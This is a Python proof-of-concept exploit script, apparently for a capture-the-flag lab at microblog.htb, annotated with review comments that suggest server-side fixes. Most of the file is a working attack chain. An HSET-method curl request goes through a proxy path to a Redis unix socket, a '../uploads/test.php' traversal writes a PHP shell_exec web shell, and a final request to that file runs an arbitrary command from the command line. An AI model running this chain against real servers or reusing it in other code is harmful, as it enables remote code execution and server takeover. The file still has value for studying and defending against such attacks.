# Proof-of-concept client for a lab web application reachable under the
# microblog.htb hostnames. Run as a script it performs, in order:
#   1. get_cookies(False)  - log in as `user`, or register if login is unusable
#   2. add_blog()          - create a blog named "a" for that account
#   3. add_pro_feature()   - send an HSET-method request through /static/
#   4. execute_code(argv1) - write a PHP file via the edit form and request it
#
# Review notes for whoever owns the target application (hedged where the
# server side is not visible from this file):
#   * Step 3 uses the HTTP method "HSET" and a path containing
#     "unix:/var/run/redis/redis.sock:". Presumably the front-end builds a
#     proxy upstream from the request path, so the request line ends up on the
#     Redis socket. Pin the upstream to fixed hosts, reject non-standard
#     methods at the edge, and require Redis authentication/ACLs.
#   * Step 4 depends on the edit endpoint accepting "../" in `id` and on
#     files under uploads/ being handed to the PHP interpreter. Canonicalise
#     and allow-list `id`, and serve upload directories as static content only.
#   * Useful log signals: unknown HTTP verbs, "unix:" inside a request path,
#     "../" in POSTed `id` values, and new *.php files appearing in uploads/.
import requests
import re  # NOTE(review): not referenced anywhere in the visible code
import sys
import os

# One shared session so cookies set by register/login are reused later.
my_session = requests.Session()
# Session traffic for http:// URLs is sent via a local proxy on port 8080
# (presumably an intercepting proxy used for inspection).
proxy = {"http": "http://127.0.0.1:8080"}
# Account name used for registration, login and the HSET key.
user = "test"


def get_cookies(force):
    """Populate `my_session` with an authenticated cookie.

    Registers the account when `force` is true or when the blog host
    answers 404; otherwise posts the login form. Returns None.
    """
    # This probe uses a plain requests.get: it bypasses both the shared
    # session and the proxy, unlike every other HTTP call in the file.
    if (requests.get("http://a.microblog.htb").status_code == 404 or force):
        print("Fckin page data was cleaned out, registering again")
        register_url = "http://app.microblog.htb:80/register/index.php"
        # Browser-like headers copied verbatim from a captured request.
        register_headers = {
            "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Accept-Language": "pl,en-US;q=0.7,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "Origin": "http://app.microblog.htb",
            "Connection": "close",
            "Referer": "http://app.microblog.htb/register/",
            "Upgrade-Insecure-Requests": "1"}
        # The password is hard-coded and identical in the login branch.
        register_data = {"first-name": user, "last-name": "asd", "username": user, "password": "asd"}
        my_session.post(register_url, headers=register_headers, data=register_data, proxies=proxy)
    else:
        login_url = "http://app.microblog.htb:80/login/index.php"
        login_headers = {
            "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Accept-Language": "pl,en-US;q=0.7,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "Origin": "http://app.microblog.htb",
            "Connection": "close",
            "Referer": "http://app.microblog.htb/login/",
            "Upgrade-Insecure-Requests": "1"}
        login_data = {"username": user, "password": "asd"}
        r = my_session.post(login_url, headers=login_headers, data=login_data, proxies=proxy)
        # NOTE(review): `in r.headers` tests response header *names*, not
        # the body or the final URL, so this only fires if the server sends
        # a header literally called "failed" - confirm that is the intent.
        if "failed" in r.headers:
            get_cookies(True)


def add_blog():
    """POST the dashboard form that creates a blog named "a"."""
    add_blog_url = "http://app.microblog.htb:80/dashboard/index.php"
    add_blog_headers = {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
        "Accept":
        "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "pl,en-US;q=0.7,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": "http://app.microblog.htb",
        "Connection": "close",
        "Referer": "http://app.microblog.htb/dashboard/?message=Registration%20successful!&status=success",
        "Upgrade-Insecure-Requests": "1"}
    # Presumably this name is what makes the a.microblog.htb host used by
    # the other functions exist - verify against the application.
    add_blog_data = {"new-blog-name": "a"}
    # The response is stored but never inspected, so failures go unnoticed.
    r = my_session.post(
        add_blog_url, headers=add_blog_headers, data=add_blog_data, proxies=proxy)


def add_pro_feature(user):
    """Shell out to curl to send an HSET-method request for `user`.

    The parameter shadows the module-level `user`. The call does not go
    through `my_session` or the proxy, and the exit status of os.system
    is discarded.
    """
    # NOTE(review): the command line is assembled with an f-string and run
    # through the shell. `user` is a constant in this file, but any caller
    # passing other text would have it parsed by the shell;
    # subprocess.run([...]) with an argument list avoids that.
    os.system(
        f"curl -X \"HSET\" 'http://microblog.htb/static/unix:/var/run/redis/redis.sock:{user}%20pro%20true%20a/b'")


def upload_file(command):
    """POST a one-line PHP file to the edit endpoint of blog "a".

    `command` is placed verbatim inside the PHP source; the `id` field
    carries a relative path that steps out of the expected directory.
    """
    php_command = f'<?php shell_exec("{command}");?>'
    url = "http://a.microblog.htb:80/edit/index.php"
    # Server-side fix belongs here: `id` should never be used as a path
    # without canonicalisation and an allow-list.
    post_data = {"id": "../uploads/test.php", "txt": php_command}
    # Response is unused; success of the write is not checked.
    r = my_session.post(url, data=post_data, proxies=proxy)


def execute_file():
    """Request the uploaded file; the response body is discarded."""
    url = "http://a.microblog.htb:80/uploads/test.php"
    my_session.get(url, proxies=proxy)


def execute_code(command):
    """Run upload_file(command) followed by execute_file()."""
    upload_file(command)
    execute_file()


# Everything below runs at import time as well as when executed directly;
# there is no `if __name__ == "__main__"` guard.
get_cookies(False)
add_blog()
add_pro_feature(user)
# Raises IndexError when the script is started without an argument.
execute_code(sys.argv[1])